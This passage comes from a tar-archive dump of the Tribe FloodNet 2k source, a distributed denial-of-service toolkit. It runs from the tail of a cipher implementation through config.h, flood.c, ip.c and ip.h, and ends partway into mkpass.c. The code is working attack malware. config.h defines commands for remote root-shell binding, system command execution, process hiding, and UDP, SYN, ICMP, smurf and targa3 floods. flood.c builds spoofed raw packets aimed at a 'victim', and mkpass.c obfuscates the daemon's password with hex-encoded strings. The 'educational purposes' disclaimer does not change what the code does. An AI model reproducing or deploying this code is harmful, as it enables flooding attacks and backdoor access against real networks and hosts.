0xa7136eeb, 0xc6bcc63e, 0x1a513742, 0xef6828bc, 0x520365d6, 0x2d6a77ab, 0x3527ed4b, 0x821fd216, 0x095c6e2e, 0xdb92f2fb, 0x5eea29cb, 0x145892f5, 0x91584f7f, 0x5483697b, 0x2667a8cc, 0x85196048, 0x8c4bacea, 0x833860d4, 0x0d23e0f9, 0x6c387e8a, 0x0ae6d249, 0xb284600c, 0xd835731d, 0xdcb1c647, 0xac4c56ea, 0x3ebd81b3, 0x230eabb0, 0x6438bc87, 0xf0b5b1fa, 0x8f5ea2b3, 0xfc184642, 0x0a036b7a, 0x4fb089bd, 0x649da589, 0xa345415e, 0x5c038323, 0x3e5d3bb9, 0x43d79572, 0x7e6dd07c, 0x06dfdf1e, 0x6c6cc4ef, 0x7160a539, 0x73bfbe70, 0x83877605, 0x4523ecf1 }, { 0x8defc240, 0x25fa5d9f, 0xeb903dbf, 0xe810c907, 0x47607fff, 0x369fe44b, 0x8c1fc644, 0xaececa90, 0xbeb1f9bf, 0xeefbcaea, 0xe8cf1950, 0x51df07ae, 0x920e8806, 0xf0ad0548, 0xe13c8d83, 0x927010d5, 0x11107d9f, 0x07647db9, 0xb2e3e4d4, 0x3d4f285e, 0xb9afa820, 0xfade82e0, 0xa067268b, 0x8272792e, 0x553fb2c0, 0x489ae22b, 0xd4ef9794, 0x125e3fbc, 0x21fffcee, 0x825b1bfd, 0x9255c5ed, 0x1257a240, 0x4e1a8302, 0xbae07fff, 0x528246e7, 0x8e57140e, 0x3373f7bf, 0x8c9f8188, 0xa6fc4ee8, 0xc982b5a5, 0xa8c01db7, 0x579fc264, 0x67094f31, 0xf2bd3f5f, 0x40fff7c1, 0x1fb78dfc, 0x8e6bd2c1, 0x437be59b, 0x99b03dbf, 0xb5dbc64b, 0x638dc0e6, 0x55819d99, 0xa197c81c, 0x4a012d6e, 0xc5884a28, 0xccc36f71, 0xb843c213, 0x6c0743f1, 0x8309893c, 0x0feddd5f, 0x2f7fe850, 0xd7c07f7e, 0x02507fbf, 0x5afb9a04, 0xa747d2d0, 0x1651192e, 0xaf70bf3e, 0x58c31380, 0x5f98302e, 0x727cc3c4, 0x0a0fb402, 0x0f7fef82, 0x8c96fdad, 0x5d2c2aae, 0x8ee99a49, 0x50da88b8, 0x8427f4a0, 0x1eac5790, 0x796fb449, 0x8252dc15, 0xefbd7d9b, 0xa672597d, 0xada840d8, 0x45f54504, 0xfa5d7403, 0xe83ec305, 0x4f91751a, 0x925669c2, 0x23efe941, 0xa903f12e, 0x60270df2, 0x0276e4b6, 0x94fd6574, 0x927985b2, 0x8276dbcb, 0x02778176, 0xf8af918d, 0x4e48f79e, 0x8f616ddf, 0xe29d840e, 0x842f7d83, 0x340ce5c8, 0x96bbb682, 0x93b4b148, 0xef303cab, 0x984faf28, 0x779faf9b, 0x92dc560d, 0x224d1e20, 0x8437aa88, 0x7d29dc96, 0x2756d3dc, 0x8b907cee, 0xb51fd240, 0xe7c07ce3, 0xe566b4a1, 0xc3e9615e, 0x3cf8209d, 0x6094d1e3, 0xcd9ca341, 0x5c76460e, 0x00ea983b, 0xd4d67881, 0xfd47572c, 0xf76cedd9, 0xbda8229c, 0x127dadaa, 0x438a074e, 0x1f97c090, 0x081bdb8a, 0x93a07ebe, 0xb938ca15, 0x97b03cff, 0x3dc2c0f8, 0x8d1ab2ec, 0x64380e51, 0x68cc7bfb, 0xd90f2788, 0x12490181, 0x5de5ffd4, 0xdd7ef86a, 0x76a2e214, 0xb9a40368, 0x925d958f, 0x4b39fffa, 0xba39aee9, 0xa4ffd30b, 0xfaf7933b, 0x6d498623, 0x193cbcfa, 0x27627545, 0x825cf47a, 0x61bd8ba0, 0xd11e42d1, 0xcead04f4, 0x127ea392, 0x10428db7, 0x8272a972, 0x9270c4a8, 0x127de50b, 0x285ba1c8, 0x3c62f44f, 0x35c0eaa5, 0xe805d231, 0x428929fb, 0xb4fcdf82, 0x4fb66a53, 0x0e7dc15b, 0x1f081fab, 0x108618ae, 0xfcfd086d, 0xf9ff2889, 0x694bcc11, 0x236a5cae, 0x12deca4d, 0x2c3f8cc5, 0xd2d02dfe, 0xf8ef5896, 0xe4cf52da, 0x95155b67, 0x494a488c, 0xb9b6a80c, 0x5c8f82bc, 0x89d36b45, 0x3a609437, 0xec00c9a9, 0x44715253, 0x0a874b49, 0xd773bc40, 0x7c34671c, 0x02717ef6, 0x4feb5536, 0xa2d02fff, 0xd2bf60c4, 0xd43f03c0, 0x50b4ef6d, 0x07478cd1, 0x006e1888, 0xa2e53f55, 0xb9e6d4bc, 0xa2048016, 0x97573833, 0xd7207d67, 0xde0f8f3d, 0x72f87b33, 0xabcc4f33, 0x7688c55d, 0x7b00a6b0, 0x947b0001, 0x570075d2, 0xf9bb88f8, 0x8942019e, 0x4264a5ff, 0x856302e0, 0x72dbd92b, 0xee971b69, 0x6ea22fde, 0x5f08ae2b, 0xaf7a616d, 0xe5c98767, 0xcf1febd2, 0x61efc8c2, 0xf1ac2571, 0xcc8239c2, 0x67214cb8, 0xb1e583d1, 0xb7dc3e62, 0x7f10bdce, 0xf90a5c38, 0x0ff0443d, 0x606e6dc6, 0x60543a49, 0x5727c148, 0x2be98a1d, 0x8ab41738, 0x20e1be24, 0xaf96da0f, 0x68458425, 0x99833be5, 0x600d457d, 0x282f9350, 0x8334b362, 0xd91d1120, 0x2b6d8da0, 0x642b1e31, 0x9c305a00, 0x52bce688, 0x1b03588a, 0xf7baefd5, 0x4142ed9c, 0xa4315c11, 0x83323ec5, 0xdfef4636, 0xa133c501, 0xe9d3531c, 0xee353783 }, { 0x9db30420, 0x1fb6e9de, 0xa7be7bef, 0xd273a298, 0x4a4f7bdb, 0x64ad8c57, 0x85510443, 0xfa020ed1, 0x7e287aff, 0xe60fb663, 0x095f35a1, 0x79ebf120, 0xfd059d43, 0x6497b7b1, 0xf3641f63, 0x241e4adf, 0x28147f5f, 0x4fa2b8cd, 0xc9430040, 0x0cc32220, 0xfdd30b30, 0xc0a5374f, 0x1d2d00d9, 0x24147b15, 0xee4d111a, 0x0fca5167, 0x71ff904c, 0x2d195ffe, 0x1a05645f, 0x0c13fefe, 0x081b08ca, 0x05170121, 0x80530100, 0xe83e5efe, 0xac9af4f8, 0x7fe72701, 0xd2b8ee5f, 0x06df4261, 0xbb9e9b8a, 0x7293ea25, 0xce84ffdf, 0xf5718801, 0x3dd64b04, 0xa26f263b, 0x7ed48400, 0x547eebe6, 0x446d4ca0, 0x6cf3d6f5, 0x2649abdf, 0xaea0c7f5, 0x36338cc1, 0x503f7e93, 0xd3772061, 0x11b638e1, 0x72500e03, 0xf80eb2bb, 0xabe0502e, 0xec8d77de, 0x57971e81, 0xe14f6746, 0xc9335400, 0x6920318f, 0x081dbb99, 0xffc304a5, 0x4d351805, 0x7f3d5ce3, 0xa6c866c6, 0x5d5bcca9, 0xdaec6fea, 0x9f926f91, 0x9f46222f, 0x3991467d, 0xa5bf6d8e, 0x1143c44f, 0x43958302, 0xd0214eeb, 0x022083b8, 0x3fb6180c, 0x18f8931e, 0x281658e6, 0x26486e3e, 0x8bd78a70, 0x7477e4c1, 0xb506e07c, 0xf32d0a25, 0x79098b02, 0xe4eabb81, 0x28123b23, 0x69dead38, 0x1574ca16, 0xdf871b62, 0x211c40b7, 0xa51a9ef9, 0x0014377b, 0x041e8ac8, 0x09114003, 0xbd59e4d2, 0xe3d156d5, 0x4fe876d5, 0x2f91a340, 0x557be8de, 0x00eae4a7, 0x0ce5c2ec, 0x4db4bba6, 0xe756bdff, 0xdd3369ac, 0xec17b035, 0x06572327, 0x99afc8b0, 0x56c8c391, 0x6b65811c, 0x5e146119, 0x6e85cb75, 0xbe07c002, 0xc2325577, 0x893ff4ec, 0x5bbfc92d, 0xd0ec3b25, 0xb7801ab7, 0x8d6d3b24, 0x20c763ef, 0xc366a5fc, 0x9c382880, 0x0ace3205, 0xaac9548a, 0xeca1d7c7, 0x041afa32, 0x1d16625a, 0x6701902c, 0x9b757a54, 0x31d477f7, 0x9126b031, 0x36cc6fdb, 0xc70b8b46, 0xd9e66a48, 0x56e55a79, 0x026a4ceb, 0x52437eff, 0x2f8f76b4, 0x0df980a5, 0x8674cde3, 0xedda04eb, 0x17a9be04, 0x2c18f4df, 0xb7747f9d, 0xab2af7b4, 0xefc34d20, 0x2e096b7c, 0x1741a254, 0xe5b6a035, 0x213d42f6, 0x2c1c7c26, 0x61c2f50f, 0x6552daf9, 0xd2c231f8, 0x25130f69, 0xd8167fa2, 0x0418f2c8, 0x001a96a6, 0x0d1526ab, 0x63315c21, 0x5e0a72ec, 0x49bafefd, 0x187908d9, 0x8d0dbd86, 0x311170a7, 0x3e9b640c, 0xcc3e10d7, 0xd5cad3b6, 0x0caec388, 0xf73001e1, 0x6c728aff, 0x71eae2a1, 0x1f9af36e, 0xcfcbd12f, 0xc1de8417, 0xac07be6b, 0xcb44a1d8, 0x8b9b0f56, 0x013988c3, 0xb1c52fca, 0xb4be31cd, 0xd8782806, 0x12a3a4e2, 0x6f7de532, 0x58fd7eb6, 0xd01ee900, 0x24adffc2, 0xf4990fc5, 0x9711aac5, 0x001d7b95, 0x82e5e7d2, 0x109873f6, 0x00613096, 0xc32d9521, 0xada121ff, 0x29908415, 0x7fbb977f, 0xaf9eb3db, 0x29c9ed2a, 0x5ce2a465, 0xa730f32c, 0xd0aa3fe8, 0x8a5cc091, 0xd49e2ce7, 0x0ce454a9, 0xd60acd86, 0x015f1919, 0x77079103, 0xdea03af6, 0x78a8565e, 0xdee356df, 0x21f05cbe, 0x8b75e387, 0xb3c50651, 0xb8a5c3ef, 0xd8eeb6d2, 0xe523be77, 0xc2154529, 0x2f69efdf, 0xafe67afb, 0xf470c4b2, 0xf3e0eb5b, 0xd6cc9876, 0x39e4460c, 0x1fda8538, 0x1987832f, 0xca007367, 0xa99144f8, 0x296b299e, 0x492fc295, 0x9266beab, 0xb5676e69, 0x9bd3ddda, 0xdf7e052f, 0xdb25701c, 0x1b5e51ee, 0xf65324e6, 0x6afce36c, 0x0316cc04, 0x8644213e, 0xb7dc59d0, 0x7965291f, 0xccd6fd43, 0x41823979, 0x932bcdf6, 0xb657c34d, 0x4edfd282, 0x7ae5290c, 0x3cb9536b, 0x851e20fe, 0x9833557e, 0x13ecf0b0, 0xd3ffb372, 0x3f85c5c1, 0x0aef7ed2 } }; #define f1(y,x,kr,km) \ t = rotl(km + x, kr); \ u = s_box[0][byte(t,3)]; \ u ^= s_box[1][byte(t,2)]; \ u -= s_box[2][byte(t,1)]; \ u += s_box[3][byte(t,0)]; \ y ^= u #define f2(y,x,kr,km) \ t = rotl(km ^ x, kr); \ u = s_box[0][byte(t,3)]; \ u -= s_box[1][byte(t,2)]; \ u += s_box[2][byte(t,1)]; \ u ^= s_box[3][byte(t,0)]; \ y ^= u #define f3(y,x,kr,km) \ t = rotl(km - x, kr); \ u = s_box[0][byte(t,3)]; \ u += s_box[1][byte(t,2)]; \ u ^= s_box[2][byte(t,1)]; \ u -= s_box[3][byte(t,0)]; \ y ^= u #define f_rnd(x,n) \ f1(x[2],x[3],l_key[n], l_key[n + 4]); \ f2(x[1],x[2],l_key[n + 1],l_key[n + 5]); \ f3(x[0],x[1],l_key[n + 2],l_key[n + 6]); \ f1(x[3],x[0],l_key[n + 3],l_key[n + 7]) #define i_rnd(x, n) \ f1(x[3],x[0],l_key[n + 3],l_key[n + 7]); \ f3(x[0],x[1],l_key[n + 2],l_key[n + 6]); \ f2(x[1],x[2],l_key[n + 1],l_key[n + 5]); \ f1(x[2],x[3],l_key[n], l_key[n + 4]) #define k_rnd(k,tr,tm) \ f1(k[6],k[7],tr[0],tm[0]); \ f2(k[5],k[6],tr[1],tm[1]); \ f3(k[4],k[5],tr[2],tm[2]); \ f1(k[3],k[4],tr[3],tm[3]); \ f2(k[2],k[3],tr[4],tm[4]); \ f3(k[1],k[2],tr[5],tm[5]); \ f1(k[0],k[1],tr[6],tm[6]); \ f2(k[7],k[0],tr[7],tm[7]) u4byte l_key[96]; u4byte * set_key (const u4byte in_key[], const u4byte key_len) { u4byte i, j, t, u, cm, cr, lk[8], tm[8], tr[8]; for (i = 0; i < key_len / 32; ++i) lk[i] = io_swap (in_key[i]); for (; i < 8; ++i) lk[i] = 0; cm = 0x5a827999; cr = 19; for (i = 0; i < 96; i += 8) { for (j = 0; j < 8; ++j) { tm[j] = cm; cm += 0x6ed9eba1; tr[j] = cr; cr += 17; } k_rnd (lk, tr, tm); for (j = 0; j < 8; ++j) { tm[j] = cm; cm += 0x6ed9eba1; tr[j] = cr; cr += 17; } k_rnd (lk, tr, tm); l_key[i + 0] = lk[0]; l_key[i + 1] = lk[2]; l_key[i + 2] = lk[4]; l_key[i + 3] = lk[6]; l_key[i + 4] = lk[7]; l_key[i + 5] = lk[5]; l_key[i + 6] = lk[3]; l_key[i + 7] = lk[1]; } return l_key; } void aes_encrypt (const u4byte in_blk[4], u4byte out_blk[4]) { u4byte t, u, blk[4]; blk[0] = io_swap (in_blk[0]); blk[1] = io_swap (in_blk[1]); blk[2] = io_swap (in_blk[2]); blk[3] = io_swap (in_blk[3]); f_rnd (blk, 0); f_rnd (blk, 8); f_rnd (blk, 16); f_rnd (blk, 24); f_rnd (blk, 32); f_rnd (blk, 40); i_rnd (blk, 48); i_rnd (blk, 56); i_rnd (blk, 64); i_rnd (blk, 72); i_rnd (blk, 80); i_rnd (blk, 88); out_blk[0] = io_swap (blk[0]); out_blk[1] = io_swap (blk[1]); out_blk[2] = io_swap (blk[2]); out_blk[3] = io_swap (blk[3]); } void decrypt (const u4byte in_blk[4], u4byte out_blk[4]) { u4byte t, u, blk[4]; blk[0] = io_swap (in_blk[0]); blk[1] = io_swap (in_blk[1]); blk[2] = io_swap (in_blk[2]); blk[3] = io_swap (in_blk[3]); f_rnd (blk, 88); f_rnd (blk, 80); f_rnd (blk, 72); f_rnd (blk, 64); f_rnd (blk, 56); f_rnd (blk, 48); i_rnd (blk, 40); i_rnd (blk, 32); i_rnd (blk, 24); i_rnd (blk, 16); i_rnd (blk, 8); i_rnd (blk, 0); out_blk[0] = io_swap (blk[0]); out_blk[1] = io_swap (blk[1]); out_blk[2] = io_swap (blk[2]); out_blk[3] = io_swap (blk[3]); } tfn2k/src/config.h100644 0 0 3211 7026540160 12363 0ustar rootroot/* * Tribe FloodNet - 2k edition * by Mixter * * config.h - user defined values * * This program is distributed for educational purposes and without any * explicit or implicit warranty; in no event shall the author or * contributors be liable for any direct, indirect or incidental damages * arising in any way out of the use of this software. * */ #ifndef _CONFIG_H #define HIDEME "tfn-daemon" /* background process name */ #define HIDEKIDS "tfn-child" /* flood/shell thread names */ #define CHLD_MAX 50 /* maximum targets a server handles at a time */ #define DELIMITER "@" /* to separate ips and broadcasts (host1@host2@...) */ #define REQUIRE_PASS /* require server password to be entered and verified before the client will work? */ #undef ATTACKLOG "attack.log" /* keep server side logs of attacked victims */ /* Note: the password is not defined here, but at compile time. The requests will be encrypted anyways, you DON'T need to change this */ #define PROTO_SEP '+' /* session header separator, can be anything */ #define ID_SHELL 'a' /* to bind a root shell */ #define ID_PSIZE 'b' /* to change size of udp/icmp packets */ #define ID_SWITCH 'c' /* to switch spoofing mode */ #define ID_STOPIT 'd' /* to stop flooding */ #define ID_SENDUDP 'e' /* to udp flood */ #define ID_SENDSYN 'f' /* to syn flood */ #define ID_SYNPORT 'g' /* to set port */ #define ID_ICMP 'h' /* to icmp flood */ #define ID_SMURF 'i' /* haps! haps! */ #define ID_TARGA 'j' /* targa3 (ip stack penetration) */ #define ID_MIX 'k' /* udp/syn/icmp intervals */ #define ID_REXEC 'l' /* execute system command */ #define _CONFIG_H #endif tfn2k/src/flood.c100644 0 0 13004 7026540160 12235 0ustar rootroot/* * Tribe FloodNet - 2k edition * by Mixter * * flood.c - packet flood implementations * * This program is distributed for educational purposes and without any * explicit or implicit warranty; in no event shall the author or * contributors be liable for any direct, indirect or incidental damages * arising in any way out of the use of this software. * */ #include "tribe.h" extern int rcounter; extern char rseed[]; int rawsock = 0, fw00ding = 0, nospoof = 0, port4syn = 0, psize = 0; static char synb[8192]; static int fbi = 1, cia = 65535; void syn (unsigned long victim, unsigned short port) { struct sa sin; struct ip *ih = (struct ip *) synb; struct tcp *th = (struct tcp *) (synb + sizeof (struct ip)); ih->ver = 4; ih->ihl = 5; ih->tos = 0x00; ih->tl = sizeof (ih) + sizeof (th); ih->id = htons (getrandom (1024, 65535)); ih->off = 0; ih->ttl = getrandom (200, 255); ih->pro = TCP; ih->sum = 0; ih->src = k00lip (); ih->dst = victim; th->src = htons (getrandom (0, 65535)); if (port > 0) th->dst = htons (port); else th->dst = htons (getrandom (0, 65535)); th->seq = htonl (getrandom (0, 65535) + (getrandom (0, 65535) << 8)); th->ack = htons (getrandom (0, 65535)); th->flg = SYN | URG; th->win = htons (getrandom (0, 65535)); th->sum = 0; th->urp = htons (getrandom (0, 65535)); th->sum = ip_sum ((u16 *) synb, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1); ih->sum = ip_sum ((u16 *) synb, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1); sin.fam = AF_INET; sin.dp = th->dst; sin.add = ih->dst; sendto (rawsock, synb, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sin, sizeof (sin)); } void udp (unsigned long lamer) { int tot_len = sizeof (struct ip) + sizeof (struct udp) + 1 + psize; struct sa llama; struct { struct ip iph; struct udp udph; unsigned char evil[65535]; } faggot; faggot.evil[psize] = '\0'; if (fbi++ > 65535) fbi = 1; if (cia-- < 1) cia = 65535; faggot.iph.ihl = 5; faggot.iph.ver = 4; faggot.iph.tos = 0x00; faggot.iph.tl = htons (tot_len); faggot.iph.id = htons (getrandom (0, 65535)); faggot.iph.off = 0; faggot.iph.ttl = getrandom (200, 255); faggot.iph.pro = UDP; faggot.iph.src = k00lip (); faggot.iph.dst = lamer; faggot.iph.sum = ip_sum ((u16 *) & faggot.iph, sizeof (faggot.iph)); faggot.udph.src = htons (cia); faggot.udph.dst = htons (fbi); faggot.udph.len = htons (sizeof (faggot.udph) + 1 + psize); faggot.udph.sum = 0; faggot.udph.sum = cksum ((u16 *) & faggot.udph, tot_len >> 1); llama.fam = AF_INET; llama.dp = faggot.udph.dst; llama.add = lamer; sendto (rawsock, &faggot, tot_len, 0, (struct sockaddr *) &llama, sizeof (llama)); } void icmp (unsigned long lamer, unsigned long src) { struct sa pothead; struct ip *iph; struct icmp *icmph; char *packet; int pktsize = sizeof (struct ip) + sizeof (struct icmp) + 64; if (psize) pktsize += psize; packet = malloc (pktsize); iph = (struct ip *) packet; icmph = (struct icmp *) (packet + sizeof (struct ip)); memset (packet, 0, pktsize); iph->ver = 4; iph->ihl = 5; iph->tos = 0; iph->tl = htons (pktsize); iph->id = htons (getpid ()); iph->off = 0; iph->ttl = 0x0; iph->pro = ICMP; iph->sum = 0; if (src == 0) { iph->src = k00lip (); iph->dst = lamer; } else { iph->src = lamer; iph->dst = src; } icmph->type = ICMP_ECHO; icmph->code = 0; icmph->sum = htons (~(ICMP_ECHO << 8)); pothead.fam = AF_INET; pothead.dp = htons (0); pothead.add = iph->dst; sendto (rawsock, packet, pktsize, 0, (struct sockaddr *) &pothead, sizeof (struct sockaddr)); free (packet); } void targa3 (unsigned long victim) { int mysize = sizeof (struct ip) + getrandom (128, 512) + psize, i; char *packet = calloc (1, mysize); struct ip *iph = (struct ip *) packet; struct udp *udh = (struct udp *) (packet + sizeof (struct ip)); struct tcp *tch = (struct tcp *) (packet + sizeof (struct ip)); struct icmp *ich = (struct icmp *) (packet + sizeof (struct ip)); struct sa sin; int proto[14] = { /* known internet protcols */ 0, 1, 2, 4, 6, 8, 12, 17, 22, 41, 58, 255, 0, }; int frags[10] = { /* (un)common fragment values */ 0, 0, 0, 8192, 0x4, 0x6, 16383, 1, 0, }; int flags[7] = { /* (un)common message flags */ 0, 0, 0, 0x4, 0, 0x1, }; for (i = 0; i < mysize; i++) { if (rcounter-- < 1) random_init (); packet[i] = rseed[rcounter]; } proto[13] = getrandom (0, 255); frags[9] = getrandom (0, 8100); flags[6] = getrandom (0, 0xf); iph->ver = 4; iph->ihl = 5; iph->tos = 0; iph->tl = htons (mysize); iph->id = htons (getrandom (0, 65535) + (getrandom (0, 65535) << 8)); iph->ttl = 0x00; iph->pro = proto[(int) getrandom (0, 13)]; switch (iph->pro) { case TCP: tch->sum = 0; tch->sum = cksum ((u16 *) packet, mysize >> 1); break; case ICMP: ich->sum = 0; ich->sum = cksum ((u16 *) packet, mysize >> 1); break; case UDP: udh->sum = 0; udh->sum = cksum ((u16 *) packet, mysize >> 1); break; } iph->off = htons (frags[(int) getrandom (0, 9)]); iph->sum = 0; iph->src = getrandom (0, 65535) + (getrandom (0, 65535) << 8); iph->dst = victim; sin.fam = AF_INET; sin.dp = htons (0); sin.add = victim; sendto (rawsock, packet, mysize, flags[(int) getrandom (0, 6)], (struct sockaddr *) &sin, sizeof (sin)); free (packet); /* free willy */ } tfn2k/src/ip.c100644 0 0 3376 7026540160 11535 0ustar rootroot/* * Tribe FloodNet - 2k edition * by Mixter * * ip.c - low level IP functions * * This program is distributed for educational purposes and without any * explicit or implicit warranty; in no event shall the author or * contributors be liable for any direct, indirect or incidental damages * arising in any way out of the use of this software. * */ #include "tribe.h" #include "ip.h" unsigned long resolve (char *host) { struct hostent *he; struct sa tmp; if (isip (host)) return (inet_addr (host)); he = gethostbyname (host); if (he) { memcpy ((caddr_t) & tmp.add, he->h_addr, he->h_length); } else return (0); return (tmp.add); } char * ntoa (u32 in) { struct in_addr ad; ad.s_addr = in; return (inet_ntoa (ad)); } int isip (char *ip) { int a, b, c, d; sscanf (ip, "%d.%d.%d.%d", &a, &b, &c, &d); if (a < 0) return 0; if (a > 255) return 0; if (b < 0) return 0; if (b > 255) return 0; if (c < 0) return 0; if (c > 255) return 0; if (d < 0) return 0; if (d > 255) return 0; return 1; } u16 cksum (u16 * buf, int nwords) { unsigned long sum; for (sum = 0; nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum; } unsigned short ip_sum (addr, len) unsigned short *addr; int len; { register int nleft = len; register unsigned short *w = addr; register int sum = 0; unsigned short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(unsigned char *) (&answer) = *(unsigned char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } tfn2k/src/ip.h100644 0 0 4524 7026540160 11536 0ustar rootroot/* * Tribe FloodNet - 2k edition * by Mixter * * ip.h - low level IP definitions * * This program is distributed for educational purposes and without any * explicit or implicit warranty; in no event shall the author or * contributors be liable for any direct, indirect or incidental damages * arising in any way out of the use of this software. * */ #ifndef _IP_H #define _IP_H #include #ifndef INADDR_ANY #define INADDR_ANY ((unsigned) 0x00000000) #endif #ifndef IP_HDRINCL #define IP_HDRINCL 3 #endif #ifndef PF_INET #define PF_INET 2 #endif #ifndef AF_INET #define AF_INET PF_INET #endif typedef char s8; typedef unsigned char u8; typedef short int s16; typedef unsigned short int u16; typedef int s32; typedef unsigned int u32; #define ICMP_ECHOREPLY 0 #define ICMP_ECHO 8 #ifndef htons #if __BYTE_ORDER == __BIG_ENDIAN #define ntohl(x) (x) #define ntohs(x) (x) #define htonl(x) (x) #define htons(x) (x) #else unsigned long int htonl (unsigned long int hostlong); unsigned short int htons (unsigned short int hostshort); unsigned long int ntohl (unsigned long int netlong); unsigned short int ntohs (unsigned short int netshort); #endif #endif #define IP 0 #define ICMP 1 #define IGMP 2 #define TCP 6 #define UDP 17 #define RAW 255 struct sa { u16 fam, dp; u32 add; u8 zero[8]; }; struct su { u16 fam; char path[108]; }; struct ip { #if __BYTE_ORDER == __LITTLE_ENDIAN u8 ihl:4, ver:4; #else u8 ver:4, ihl:4; #endif u8 tos; u16 tl, id, off; u8 ttl, pro; u16 sum; u32 src, dst; }; struct tcp { u16 src, dst; u32 seq, ack; #if __BYTE_ORDER == __LITTLE_ENDIAN u8 x2:4, off:4; #else u8 off:4, x2:4; #endif u8 flg; /* flag1 | flag2 */ #define FIN 0x01 #define SYN 0x02 #define RST 0x04 #define PUSH 0x08 #define ACK 0x10 #define URG 0x20 u16 win, sum, urp; }; struct udp { u16 src, dst, len, sum; }; struct icmp { u8 type, code; u16 sum; u16 id, seq; }; #ifndef in_addr struct in_addr { unsigned long int s_addr; }; #endif char *inet_ntoa (struct in_addr); unsigned long int inet_addr (const char *cp); u16 cksum (u16 *, int); unsigned short ip_sum (unsigned short *, int); char *ntoa (u32); int isip (char *); unsigned long resolve (char *); #endif tfn2k/src/mkpass.c100644 0 0 12055 7026540160 12435 0ustar rootroot/* mkpass - creates a temporary source file that uses random alignment and other fancy stuff to disguise a 256 bit password in an executable (No, this is not 100% SECURE, it just makes it awfully HARD to find the password) - Mixter */ #include #include #include #include #include #include #include char *getpass (const char *prompt); static char *header = "\x2f\x2a\x20\x50\x41\x53\x53\x2e\x68\x20\x2d\x20\x74\x65\x6d\x70\x6f\x72" "\x61\x72\x79\x20\x70\x61\x73\x73\x77\x6f\x72\x64\x20\x69\x6e\x63\x6c\x75" "\x64\x65\x0a\x20\x20\x20\x44\x45\x4c\x45\x54\x45\x20\x74\x68\x69\x73\x20" "\x66\x69\x6c\x65\x20\x61\x66\x74\x65\x72\x20\x63\x6f\x6d\x70\x69\x6c\x61" "\x74\x69\x6f\x6e\x20\x21\x20\x2a\x2f\x0a\x0a\x23\x69\x6e\x63\x6c\x75\x64" "\x65\x20\x22\x61\x65\x73\x2e\x68\x22\x0a\x0a\x63\x68\x61\x72\x0a"; static char *function = "\x76\x6f\x69\x64\x20\x73\x65\x63\x75\x72\x69\x74\x79\x5f\x74\x68\x72\x6f" "\x75\x67\x68\x5f\x6f\x62\x73\x63\x75\x72\x69\x74\x79\x20\x28\x20\x69\x6e" "\x74\x20\x73\x77\x31\x74\x63\x68\x20\x29\x0a\x7b\x0a\x63\x68\x61\x72\x20" "\x68\x69\x5b\x33\x32\x5d\x3b\x0a\x0a\x69\x66\x20\x28\x21\x73\x77\x31\x74" "\x63\x68\x29\x20\x61\x65\x73\x5f\x73\x65\x74\x6b\x65\x79\x28\x22\x22\x29" "\x3b\x0a\x20\x20\x65\x6c\x73\x65\x0a\x20\x7b\x0a\x20\x68\x69\x5b\x30\x5d" "\x20\x3d\x20\x5f\x63\x31\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x31" "\x5d\x20\x3d\x20\x5f\x63\x32\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b" "\x32\x5d\x20\x3d\x20\x5f\x63\x33\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69" "\x5b\x33\x5d\x20\x3d\x20\x5f\x63\x34\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68" "\x69\x5b\x34\x5d\x20\x3d\x20\x5f\x63\x35\x20\x2d\x20\x61\x6c\x3b\x0a\x20" "\x68\x69\x5b\x35\x5d\x20\x3d\x20\x5f\x63\x36\x20\x2d\x20\x61\x6c\x3b\x0a" "\x20\x68\x69\x5b\x36\x5d\x20\x3d\x20\x5f\x63\x37\x20\x2d\x20\x61\x6c\x3b" "\x0a\x20\x68\x69\x5b\x37\x5d\x20\x3d\x20\x5f\x63\x38\x20\x2d\x20\x61\x6c" "\x3b\x0a\x20\x68\x69\x5b\x38\x5d\x20\x3d\x20\x5f\x63\x39\x20\x2d\x20\x61" "\x6c\x3b\x0a\x20\x68\x69\x5b\x39\x5d\x20\x3d\x20\x5f\x63\x31\x30\x20\x2d" "\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x31\x30\x5d\x20\x3d\x20\x5f\x63\x31" "\x31\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x31\x31\x5d\x20\x3d\x20" "\x5f\x63\x31\x32\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x31\x32\x5d" "\x20\x3d\x20\x5f\x63\x31\x33\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b" "\x31\x33\x5d\x20\x3d\x20\x5f\x63\x31\x34\x20\x2d\x20\x61\x6c\x3b\x0a\x20" "\x68\x69\x5b\x31\x34\x5d\x20\x3d\x20\x5f\x63\x31\x35\x20\x2d\x20\x61\x6c" "\x3b\x0a\x20\x68\x69\x5b\x31\x35\x5d\x20\x3d\x20\x5f\x63\x31\x36\x20\x2d" "\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x31\x36\x5d\x20\x3d\x20\x5f\x63\x31" "\x37\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x31\x37\x5d\x20\x3d\x20" "\x5f\x63\x31\x38\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x31\x38\x5d" "\x20\x3d\x20\x5f\x63\x31\x39\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b" "\x31\x39\x5d\x20\x3d\x20\x5f\x63\x32\x30\x20\x2d\x20\x61\x6c\x3b\x0a\x20" "\x68\x69\x5b\x32\x30\x5d\x20\x3d\x20\x5f\x63\x32\x31\x20\x2d\x20\x61\x6c" "\x3b\x0a\x20\x68\x69\x5b\x32\x31\x5d\x20\x3d\x20\x5f\x63\x32\x32\x20\x2d" "\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x32\x32\x5d\x20\x3d\x20\x5f\x63\x32" "\x33\x20\x2d\x20\x61\x6c\x3b\x0a\x20\x68\x69\x5b\x32\x33\x5d\x20\x3d\x20" 